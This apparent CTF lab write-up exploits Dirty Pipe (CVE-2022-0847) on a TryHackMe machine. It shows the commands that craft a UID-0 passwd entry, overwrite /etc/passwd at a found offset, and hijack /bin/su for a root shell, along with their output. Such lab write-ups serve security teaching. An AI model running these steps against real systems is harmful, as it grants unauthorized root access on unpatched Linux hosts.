Post

Exploiting Dirty Pipe (CVE-2022-0847)

Posted
By greekbust
4 min read

The Dirty Pipe exploit vulnerability lets us specify the file we want to overwrite, the offset we would like to overwrite it at, and the content we would like to insert.

For my reference: https://dirtypipe.cm4all.com/

The exploit wont let us create files (we can only overwrite information in existing files), we will first need to find a file our user can read, but that still allows us to elevate our privileges. The obvious choice in these conditions is /etc/passwd. Whilst password hashes are usually stored in a restricted- access /etc/shadow in modern Linux systems.

The passwd file

Passwd entries are comprised of 7 fields, separated by colons (:). For example root:x:0:0:root:/root:/bin/bash

In order these fields are:

  • The username root
  • The users password hash. In most cases the hash will not actually be given here and instead will be replaced with x. This means that the hash can instead be found in /etc/shadow.
  • The users UID (User ID) -as the root user, this is 0
  • The users GUID (Group ID) - as the root user this is also 0
  • An description of the account. This is simply “root”, however it can be left blank.
  • The users home directory (/root)
  • The users login shell (/bin/bash)

If we can manually form our own entry (including a full password hash) and insert it into the passwd file then we can create a new user account. We can create this user account to have the UID and GUID of 0, effectively giving our new account the same permissions as root.

Lets generate a password hash and form a valid passwd entry before moving on. Using openssl command to create a SHA512Crypt hash of my chosen password:

1
2

openssl passwd -6 --salt pingu "pingu"


1
2
3
4

tryhackme@dirty-pipe:~$ openssl passwd -6 --salt pingu "pingu"     

$6$pingu$wbDhnyA1IsChjEMNftK006fE8k9ZPUlYYXsKtAA6bviCqQbpPjK55DA3T9fF9izEMLde/zTxTYZlY3CyjAIW20


1

USERNAME:HASH:0:0::/root:/bin/bash

Format it for passwd file

needs to have quotes an a newline after /bin/bash part here:

1

pingu:$6$pingu$wbDhnyA1IsChjEMNftK006fE8k9ZPUlYYXsKtAA6bviCqQbpPjK55DA3T9fF9izEMLde/zTxTYZlY3CyjAIW20:0:0::/root:/bin/bash

The vulnerability does not allow us to append to the file, so we are going to have to pick an account and overwrite it. Realistically speaking, given the length of our passwd entry (hash inclusive) this will probably actually overwrite several accounts. Looking through the passwd file, the games account stands out as being a good candidate for a little-used account which we can afford to nuke for a few minutes. We can use grep with the -b switch to find the offset of games from the start of the file.

1
2
3
4
5

tryhackme@dirty-pipe:~$ grep -b "games" /etc/passwd                

189:games:x:5:60:games:/usr/games:/usr/sbin/nologin                

tryhackme@dirty-pipe:~$

The offset is 189.

Lets run our exploit.

Exploit complete

1
2
3
4
5
6
7
8
9

tryhackme@dirty-pipe:~/Exploit/PoC$ ./exploit /etc/passwd 189 ping

u:$6$pingu$wbDhnyA1IsChjEMNftK006fE8k9ZPUlYYXsKtAA6bviCqQbpPjK55DA3

T9fF9izEMLde/zTxTYZlY3CyjAIW20:0:0::/root:/bin/bash                

> 

It worked!

In system, get flag.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

tryhackme@dirty-pipe:~/Exploit/PoC$ ./exploit /etc/passwd 189 ping

u:$6$pingu$wbDhnyA1IsChjEMNftK006fE8k9ZPUlYYXsKtAA6bviCqQbpPjK55DA3

T9fF9izEMLde/zTxTYZlY3CyjAIW20:0:0::/root:/bin/bash                

>  

It worked!                                                         

tryhackme@dirty-pipe:~/Exploit/PoC$ su pingu                       

Password:                                                          

root@dirty-pipe:/home/tryhackme/Exploit/PoC# cat /root/flag.txt    

THM{MmU4Zjg0NDdjNjFiZWM5ZjUyZGEyMzlm}                              

root@dirty-pipe:/home/tryhackme/Exploit/PoC#

Move /etc/passwd back from backup in /tmp/passwd

1
2
3
4
5
6
7
8

root@dirty-pipe:/home/tryhackme/Exploit/PoC# ls                    

exploit  poc.c                                                     

root@dirty-pipe:/home/tryhackme/Exploit/PoC# cp /tmp/passwd /etc/passwd                                                               

root@dirty-pipe:/home/tryhackme/Exploit/PoC#

Second exploit

Second exploit -> This exploit takes the arbitrary file write one stage further by abusing the special bit. SUID programs usually lose their SUID bit when you attempt to write to them; however, with Dirty pipe , this does not happen, in other words, we can write to any program that has permissions to execute with higher privileges.

Lets overwrite /bin/su rather then /etc/passwd injecting shellcode into it which then gets executed with the permissions of the privileged user.

we exploited the Dirty Pipe vulnerability using Max Kellerman’s original proof of concept exploit code; however, other exploits have since been released. The original PoC allowed us to overwrite any file with arbitrary data at an offset of our choosing; however, other implementations have abused the arbitrary file write vulnerability in a variety of different ways.

To demonstrate this concept, a second exploit script has been added to the lab machine — this can be found on the target at /home/tryhackme/Exploit/Bl4sty/dirtypipez.c. As the directory structure suggests, this implementation was coded by @bl4sty. The original exploit code can be downloaded from bl4sty’s website here.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

tryhackme@dirty-pipe:~/Exploit/Bl4sty$ ./exploit /bin/su           

[+] hijacking suid binary..                                        

[+] dropping suid shell..                                          

[+] restoring suid binary..                                        

[+] popping root shell.. (dont forget to clean up /tmp/sh ;))      

# whoami                                                           

root
Ethical Hacking, Capture the Flag (CTF) challenges
ctfs CVE-2022-0847
This post is licensed under CC BY 4.0 by the author.